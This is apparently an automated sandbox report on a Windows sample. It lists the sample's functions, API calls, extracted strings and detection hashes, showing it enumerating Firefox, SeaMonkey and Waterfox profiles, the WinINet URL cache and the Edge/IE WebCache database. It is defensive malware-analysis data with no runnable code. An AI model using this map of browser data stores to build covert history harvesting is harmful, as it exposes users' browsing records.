                                                                                • Opcode Fuzzy Hash: 4b916cbbc89a2321bc65a90fe44e1004a538d968f20119a17c3d59cf1106350c
                                                                                • Instruction Fuzzy Hash: 8051D172900219DBDF10DFA5C8417DEB7F4AF54314F1501AAEC14EB246E778EA8ACB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004184FD, Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 309304ea7a59cf2b4c6616ecbb65b33bb7f0bfa004ad3dfe8db1495a34bdaae3
                                                                                • Instruction ID: 7569a71f635be5ecbfbcc105966687f5e261f8117845a41900d386b0156fd9ec
                                                                                • Opcode Fuzzy Hash: 309304ea7a59cf2b4c6616ecbb65b33bb7f0bfa004ad3dfe8db1495a34bdaae3
                                                                                • Instruction Fuzzy Hash: 86314E36A04320AFCB209F31FC845BA77B1FF46325F60097FF856D6241DB299885869E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403C9C, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                • memset.MSVCRT ref: 00403D13
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                • API String ID: 4039892925-11920434
                                                                                • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403E2D, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403E50
                                                                                • memset.MSVCRT ref: 00403E65
                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                • API String ID: 4039892925-2068335096
                                                                                • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403FBE, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                • memset.MSVCRT ref: 0040400B
                                                                                • memset.MSVCRT ref: 00404020
                                                                                • memset.MSVCRT ref: 00404035
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 004040FC
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                • API String ID: 4039892925-3369679110
                                                                                • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00444432, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                • API String ID: 3510742995-2641926074
                                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004032B4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 004033B7
                                                                                • memcpy.MSVCRT ref: 004033D0
                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                • String ID: $0.@
                                                                                • API String ID: 3030842498-1896041820
                                                                                • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C274, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,?), ref: 0040C30D
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,?), ref: 0040C369
                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,?), ref: 0040C39F
                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CacheFind$Entry$Next$CloseErrorFirstLast
                                                                                • String ID: visited:
                                                                                • API String ID: 2067934103-1702587658
                                                                                • Opcode ID: fb247a9fb7045ce9314220159ead840a63808084b5a4060cf4398078dab1d27d
                                                                                • Instruction ID: 57392237a9b772fd8c0f140e5142f8dcf002ba96efd34128754fd9f22b5d8e6d
                                                                                • Opcode Fuzzy Hash: fb247a9fb7045ce9314220159ead840a63808084b5a4060cf4398078dab1d27d
                                                                                • Instruction Fuzzy Hash: 19416275900219EBCB10EF95CC85AEFBBB8FF45714F10416AE905F7281D7389A45CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403BED, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403C09
                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                • API String ID: 1534475566-1174173950
                                                                                • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412465, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041249C
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004124D2
                                                                                • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??2@HandleIconLoadModulememset
                                                                                • String ID: r!A
                                                                                • API String ID: 1442804033-628097481
                                                                                • Opcode ID: 84981b687c076ba5e98c045a32d2ad196b9af3b8e198bd9761a20a505c3563de
                                                                                • Instruction ID: d715666a4d312430f00fc570e48f5c687577f0fccb8b4ed7fc0ab73f86a200ef
                                                                                • Opcode Fuzzy Hash: 84981b687c076ba5e98c045a32d2ad196b9af3b8e198bd9761a20a505c3563de
                                                                                • Instruction Fuzzy Hash: 14316DB19053889FDB30EF669C896CAB7E8FF44314F00452FE90DCB241EBB95A548B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00414C2E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                • memset.MSVCRT ref: 00414C87
                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 71295984-2036018995
                                                                                • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041443E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                • String ID: "%s"
                                                                                • API String ID: 1343145685-3297466227
                                                                                • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413CA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                • API String ID: 1714573020-3385500049
                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00444432, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 217COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: BINARY$NOCASE$RTRIM$no such vfs: %s
                                                                                • API String ID: 3510742995-3177411277
                                                                                • Opcode ID: c3b182d7b313c474167ab789c652774951e251e589a23ce73bbd927e6b7910b1
                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                • Opcode Fuzzy Hash: c3b182d7b313c474167ab789c652774951e251e589a23ce73bbd927e6b7910b1
                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041F1A5, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID: @ $SQLite format 3
                                                                                • API String ID: 1475443563-3708268960
                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004110DC, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: _wcsicmpqsort
                                                                                • String ID: /nosort$/sort
                                                                                • API String ID: 1579243037-1578091866
                                                                                • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E5ED, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                • memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                Strings
                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
